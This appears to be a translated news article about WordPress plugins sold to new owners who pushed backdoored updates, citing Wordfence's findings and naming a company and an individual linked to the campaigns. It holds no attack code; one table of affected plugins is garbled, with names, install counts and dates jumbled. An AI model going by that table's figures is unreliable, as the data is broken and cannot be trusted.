In recent weeks, the problems of the WordPress plugin ecosystem have received close attention from experts. So, three years ago, backdoors were found in 14 plugins for the popular CMS, which were then removed from the official repository. But a recent study showed that hundreds of sites are still running these dangerous solutions.
Slightly earlier in the WordPress Plugins Directory a more recent Captcha plugin was discovered , which also contained a backdoor. Captcha has been installed on 300,000 sites. As a result, the WordPress developers took unprecedented measures and forcibly updated the malicious version of the plugin to a “clean” one.
Now Wordfence analysts reported that three more plugins are affected by the same problem.
50 000+ v2.1.0
v2.1.0( August 2017)
|No Follow All External Links 9 000+ v2.1.0 (April 2017) cloud.wpserve.org||December 19, 2017||30 000+||December 22, 2017|
The situation with the above plugins is similar to the previous cases. Thus, all plug-ins access the remote servers of the attackers, and also embed various content and SEO links on the pages of infected sites.
Wordfence researchers believe that the infection of all three plugins is most likely the work of the same attacker. Experts came to this conclusion during the study of the threat and a thorough investigation. So, in two out of three cases, backdoors access domains that are located on the same IP address. Two plugins out of three from the developers were bought by the same company, Orb Online. In both cases, the purchase letters were written according to the same template. And most importantly, in all three cases, the backdoor code is almost the same.
Analysts note with sadness that now we are witnessing an already established trend or a well-established fraudulent scheme. A company buys a plugin from its developer, waits for a while, and then releases a malicious update that ends up infecting many sites. Moreover, criminals often act on a very large scale.
For example, a recent infection of the Captcha plugin with a backdoor has been linked to a specific person. Information security experts found out that behind the malicious campaign was a person who had previously been convicted of distributing backdoors through plugins. According to analysts, this is Mason Soiza (Mason Soiza) who was previously caught injecting a malicious code to the Display Widgets plugin. Let me remind you that this “product” was completely removed from the official repository four times.